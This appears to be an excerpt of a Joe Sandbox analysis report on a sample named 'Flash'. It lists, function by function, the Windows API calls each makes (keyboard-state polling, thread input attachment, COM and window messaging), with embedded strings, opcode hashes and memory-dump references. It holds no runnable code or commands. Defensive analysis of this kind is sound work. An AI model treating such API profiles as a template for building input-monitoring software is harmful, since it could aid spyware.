                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                        • String ID:
                                                        • API String ID: 4176008265-0
                                                        • Opcode ID: 2d5d58641ebfa667a9cba58820b52df4f5d8ea028edcf672cc249dc11aac8c49
                                                        • Instruction ID: 923e21e08a137f7e2429ebdd18a232024d1dac406aa160e355c3a578159e63c9
                                                        • Opcode Fuzzy Hash: 2d5d58641ebfa667a9cba58820b52df4f5d8ea028edcf672cc249dc11aac8c49
                                                        • Instruction Fuzzy Hash: 32618A70900249AFEB21CFA4CD89FAEBFB9EB41344F24445AF841A7291D771AD46DB21
                                                        APIs
                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A575CA
                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A575CD
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00A575F1
                                                        • _memset.LIBCMT ref: 00A57602
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A57614
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A5768C
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow_memset
                                                        • String ID:
                                                        • API String ID: 830647256-0
                                                        • Opcode ID: bb9299d8be224c5a1bc2500662717a86dcb190d669b4696c5ced61922a6a57cd
                                                        • Instruction ID: d72bbcce8f9d5c57aa6aa333e456c2038e89ae3a0204999d2b0d963cc4567386
                                                        • Opcode Fuzzy Hash: bb9299d8be224c5a1bc2500662717a86dcb190d669b4696c5ced61922a6a57cd
                                                        • Instruction Fuzzy Hash: DD618B75A04208AFDB10DFA4DD81EEE77F8FB09710F10419AFA15A72A1D770AD46DB60
                                                        APIs
                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00A277DD
                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00A27836
                                                        • VariantInit.OLEAUT32(?), ref: 00A27848
                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00A27868
                                                        • VariantCopy.OLEAUT32(?,?), ref: 00A278BB
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00A278CF
                                                        • VariantClear.OLEAUT32(?), ref: 00A278E4
                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00A278F1
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A278FA
                                                        • VariantClear.OLEAUT32(?), ref: 00A2790C
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A27917
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                        • String ID:
                                                        • API String ID: 2706829360-0
                                                        • Opcode ID: ee4406d4eb91066353461e0a2364634968fbde88270f417bf66f958ad396232b
                                                        • Instruction ID: 59311da1a9ec6adce3966d65f1f95fd3e9650ee3921a5b15a7e410a48c27eb92
                                                        • Opcode Fuzzy Hash: ee4406d4eb91066353461e0a2364634968fbde88270f417bf66f958ad396232b
                                                        • Instruction Fuzzy Hash: A1417835A00219DFCB14DFA8D848DAE7BB9FF48350F008479E955A7261CB70AA86CF90
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00A30530
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00A305B1
                                                        • GetKeyState.USER32(000000A0), ref: 00A305CC
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00A305E6
                                                        • GetKeyState.USER32(000000A1), ref: 00A305FB
                                                        • GetAsyncKeyState.USER32(00000011), ref: 00A30613
                                                        • GetKeyState.USER32(00000011), ref: 00A30625
                                                        • GetAsyncKeyState.USER32(00000012), ref: 00A3063D
                                                        • GetKeyState.USER32(00000012), ref: 00A3064F
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00A30667
                                                        • GetKeyState.USER32(0000005B), ref: 00A30679
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: State$Async$Keyboard
                                                        • String ID:
                                                        • API String ID: 541375521-0
                                                        • Opcode ID: 20bc64d89b4019afa5aed871d9ba0717a4a64e42d7f0fc2a6b0ba6af1fe841f9
                                                        • Instruction ID: 8695450625e188f3ac9ef7d81ef1ea20e8f53d0399f05591606e31fea593bd04
                                                        • Opcode Fuzzy Hash: 20bc64d89b4019afa5aed871d9ba0717a4a64e42d7f0fc2a6b0ba6af1fe841f9
                                                        • Instruction Fuzzy Hash: 8141C8305047CA6DFF3187648825BB6BEB06B51704F08805EF5C6875C1EBE899D8CFA2
                                                        APIs
                                                          • Part of subcall function 009D4D37: __itow.LIBCMT ref: 009D4D62
                                                          • Part of subcall function 009D4D37: __swprintf.LIBCMT ref: 009D4DAC
                                                        • CoInitialize.OLE32 ref: 00A48AED
                                                        • CoUninitialize.OLE32 ref: 00A48AF8
                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00A63BBC,?), ref: 00A48B58
                                                        • IIDFromString.OLE32(?,?), ref: 00A48BCB
                                                        • VariantInit.OLEAUT32(?), ref: 00A48C65
                                                        • VariantClear.OLEAUT32(?), ref: 00A48CC6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                        • API String ID: 834269672-1287834457
                                                        • Opcode ID: b66654c4a71674d2b2b44091ee4c713f75c1318aab0de8ccb9ee49d0f1381016
                                                        • Instruction ID: 560d0b16d79e133b725f30680f9d1ac8e92a06e7929a25b9967ae3dd53d627ef
                                                        • Opcode Fuzzy Hash: b66654c4a71674d2b2b44091ee4c713f75c1318aab0de8ccb9ee49d0f1381016
                                                        • Instruction Fuzzy Hash: 0B619D74608711AFC710DF54E889F6EBBE8EF84714F004819F9819B291CB78ED49CBA2
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00A3BB13
                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00A3BB89
                                                        • GetLastError.KERNEL32 ref: 00A3BB93
                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00A3BC00
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                        • API String ID: 4194297153-14809454
                                                        • Opcode ID: b5ee7c7fa2401c6fc11696e6bee4fa305abe891e01b30926287934cadf3b6f33
                                                        • Instruction ID: f35c8f289035cd4b9793ca80bd6811c39c521c438778a76add4180d16b9e6e34
                                                        • Opcode Fuzzy Hash: b5ee7c7fa2401c6fc11696e6bee4fa305abe891e01b30926287934cadf3b6f33
                                                        • Instruction Fuzzy Hash: F431B435A10209AFCB10EF68C855EAEB7B9EF44700F14856AF606D7295DF709D41CB60
                                                        APIs
                                                          • Part of subcall function 009E1A36: _memmove.LIBCMT ref: 009E1A77
                                                          • Part of subcall function 00A2B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00A2B7BD
                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00A29BCC
                                                        • GetDlgCtrlID.USER32 ref: 00A29BD7
                                                        • GetParent.USER32 ref: 00A29BF3
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A29BF6
                                                        • GetDlgCtrlID.USER32(?), ref: 00A29BFF
                                                        • GetParent.USER32(?), ref: 00A29C1B
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00A29C1E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1536045017-1403004172
                                                        • Opcode ID: 3941757da9adb030f3c37c3c4b36d8b8f4640a6ce9bd0a4d20dcd87736f60f39
                                                        • Instruction ID: 1edde67e3b34af75396c54e18853512f13d001e59af7cabca1ef5598f03813ba
                                                        • Opcode Fuzzy Hash: 3941757da9adb030f3c37c3c4b36d8b8f4640a6ce9bd0a4d20dcd87736f60f39
                                                        • Instruction Fuzzy Hash: 1621CF74A00114BFDF04EBA5DC95EFFBBB9EF95310F100126F961932A1DBB548659B20
                                                        APIs
                                                          • Part of subcall function 009E1A36: _memmove.LIBCMT ref: 009E1A77
                                                          • Part of subcall function 00A2B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00A2B7BD
                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00A29CB5
                                                        • GetDlgCtrlID.USER32 ref: 00A29CC0
                                                        • GetParent.USER32 ref: 00A29CDC
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A29CDF
                                                        • GetDlgCtrlID.USER32(?), ref: 00A29CE8
                                                        • GetParent.USER32(?), ref: 00A29D04
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00A29D07
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1536045017-1403004172
                                                        • Opcode ID: 0d5349454c0cb46169673446412eee81b66758d180c0b17a4c327e7025cdcd90
                                                        • Instruction ID: d8070d63dbbb6b75363f5451f0e97e8799d67e2e7507fb31ccab2bab4e10bcee
                                                        • Opcode Fuzzy Hash: 0d5349454c0cb46169673446412eee81b66758d180c0b17a4c327e7025cdcd90
                                                        • Instruction Fuzzy Hash: 0321D075A01114BFDF04EBA5CC85EFFBBB9EF94300F100022F961932A1DBB589659B20
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00A48FC1
                                                        • CoInitialize.OLE32(00000000), ref: 00A48FEE
                                                        • CoUninitialize.OLE32 ref: 00A48FF8
                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00A490F8
                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00A49225
                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00A63BDC), ref: 00A49259
                                                        • CoGetObject.OLE32(?,00000000,00A63BDC,?), ref: 00A4927C
                                                        • SetErrorMode.KERNEL32(00000000), ref: 00A4928F
                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A4930F
                                                        • VariantClear.OLEAUT32(?), ref: 00A4931F
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                        • String ID:
                                                        • API String ID: 2395222682-0
                                                        • Opcode ID: ffd719484234acb826e73779f6e1db68ab117ec7bb5c007327b2a293b920f4b5
                                                        • Instruction ID: 0af6357ede6e7b1741178b8294208bc9a766042ff31c3f5f8df338ddfeae0b3f
                                                        • Opcode Fuzzy Hash: ffd719484234acb826e73779f6e1db68ab117ec7bb5c007327b2a293b920f4b5
                                                        • Instruction Fuzzy Hash: 86C12075208305AFC700DF68C884A6BB7E9BFC9708F00491DF98A9B251DB71ED46CB92
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00A319EF
                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00A30A67,?,00000001), ref: 00A31A03
                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00A31A0A
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A30A67,?,00000001), ref: 00A31A19
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A31A2B
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A30A67,?,00000001), ref: 00A31A44
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A30A67,?,00000001), ref: 00A31A56
                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00A30A67,?,00000001), ref: 00A31A9B
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00A30A67,?,00000001), ref: 00A31AB0
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00A30A67,?,00000001), ref: 00A31ABB
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                        • String ID:
                                                        • API String ID: 2156557900-0
                                                        • Opcode ID: a2299189be508bafc0b0e1c24a0700c0b921b7f685a8d14390b2b4037160498d
                                                        • Instruction ID: fb7a36a0cbd2a6c0a061be5b89d308a48933cac773e3ecab43c60f4eac59cf1c
                                                        • Opcode Fuzzy Hash: a2299189be508bafc0b0e1c24a0700c0b921b7f685a8d14390b2b4037160498d
                                                        • Instruction Fuzzy Hash: 0731A275A12204BFDB10DF94DC84F7A77BAEB55356F508116F900D6190DBF89D818B60
                                                        APIs
                                                        • GetSysColor.USER32(00000008), ref: 009D260D
                                                        • SetTextColor.GDI32(?,000000FF), ref: 009D2617
                                                        • SetBkMode.GDI32(?,00000001), ref: 009D262C
                                                        • GetStockObject.GDI32(00000005), ref: 009D2634
                                                        • GetClientRect.USER32(?), ref: 00A0C0FC
                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00A0C113
                                                        • GetWindowDC.USER32(?), ref: 00A0C11F
                                                        • GetPixel.GDI32(00000000,?,?), ref: 00A0C12E
                                                        • ReleaseDC.USER32(?,00000000), ref: 00A0C140
                                                        • GetSysColor.USER32(00000005), ref: 00A0C15E
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                        • String ID:
                                                        • API String ID: 3430376129-0
                                                        • Opcode ID: feef26eebc8938b48d229fc84073534b52b6115ac5c9d1881ef92fcf9791e4aa
                                                        • Instruction ID: b76c4b7824288624de3cae6dbb436da53c54141f218a8cd93396079b42cc3b5a
                                                        • Opcode Fuzzy Hash: feef26eebc8938b48d229fc84073534b52b6115ac5c9d1881ef92fcf9791e4aa
                                                        • Instruction Fuzzy Hash: 06114F31540205BFDB619FA4EC08FEA7B75EB19331F104266FA66951E1CBB10992EF11
                                                        APIs
                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 009DADE1
                                                        • OleUninitialize.OLE32(?,00000000), ref: 009DAE80
                                                        • UnregisterHotKey.USER32(?), ref: 009DAFD7
                                                        • DestroyWindow.USER32(?), ref: 00A12F64
                                                        • FreeLibrary.KERNEL32(?), ref: 00A12FC9
                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A12FF6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                        • String ID: close all
                                                        • API String ID: 469580280-3243417748
                                                        • Opcode ID: 8fd42f422044263b5222aaf09de7a676154be5c3fab106173c72ce413b44a6d3
                                                        • Instruction ID: 7d675114f1e9ed68e3bb87036df613b8a2813c8f45c3a0de31f4b9c43731cc4d
                                                        • Opcode Fuzzy Hash: 8fd42f422044263b5222aaf09de7a676154be5c3fab106173c72ce413b44a6d3
                                                        • Instruction Fuzzy Hash: 1CA17E717412128FCB29EF55C595F69F3A4BF44700F1086ADE50AAB262CB30ED62CF91
                                                        APIs
                                                        • EnumChildWindows.USER32(?,00A2B13A), ref: 00A2B078
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ChildEnumWindows
                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                        • API String ID: 3555792229-1603158881
                                                        • Opcode ID: f304b741d982e1014557bec0c47739f889971d44e946468b0e78c0f61afbac01
                                                        • Instruction ID: e4058b0ba89135ad89db417f2a615f5739da051d73ce7eb40dc0584aaa0cc333
                                                        • Opcode Fuzzy Hash: f304b741d982e1014557bec0c47739f889971d44e946468b0e78c0f61afbac01
                                                        • Instruction Fuzzy Hash: 30911A70500225EBDB18EF68D481BEEFB75BF54300F108139E95AA3192DF346D99CBA1
                                                        APIs
                                                        • SetWindowLongW.USER32(?,000000EB), ref: 009D327E
                                                          • Part of subcall function 009D218F: GetClientRect.USER32(?,?), ref: 009D21B8
                                                          • Part of subcall function 009D218F: GetWindowRect.USER32(?,?), ref: 009D21F9
                                                          • Part of subcall function 009D218F: ScreenToClient.USER32(?,?), ref: 009D2221
                                                        • GetDC.USER32 ref: 00A0D073
                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A0D086
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00A0D094
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00A0D0A9
                                                        • ReleaseDC.USER32(?,00000000), ref: 00A0D0B1
                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00A0D13C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                        • String ID: U
                                                        • API String ID: 4009187628-3372436214
                                                        • Opcode ID: 73cc5c7159ca565b60d2809f3ed2331f9a388a19f8ed54d0d7be054d9ebd2ed0
                                                        • Instruction ID: a43f48860b1c17b497151c99b8593f3c2cdb9fff864bd57306a82ffcb4d8a7e6
                                                        • Opcode Fuzzy Hash: 73cc5c7159ca565b60d2809f3ed2331f9a388a19f8ed54d0d7be054d9ebd2ed0
                                                        • Instruction Fuzzy Hash: 28711531904209DFCF21CFA4D880AAA7BB5FF49321F14826AFD565A2A5C7318992DF61
                                                        APIs
                                                          • Part of subcall function 009D29E2: GetWindowLongW.USER32(?,000000EB), ref: 009D29F3
                                                          • Part of subcall function 009D2714: GetCursorPos.USER32(?), ref: 009D2727
                                                          • Part of subcall function 009D2714: ScreenToClient.USER32(00A977B0,?), ref: 009D2744
                                                          • Part of subcall function 009D2714: GetAsyncKeyState.USER32(00000001), ref: 009D2769
                                                          • Part of subcall function 009D2714: GetAsyncKeyState.USER32(00000002), ref: 009D2777
                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00A5C69C
                                                        • ImageList_EndDrag.COMCTL32 ref: 00A5C6A2
                                                        • ReleaseCapture.USER32 ref: 00A5C6A8
                                                        • SetWindowTextW.USER32(?,00000000), ref: 00A5C752
                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00A5C765
                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00A5C847
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
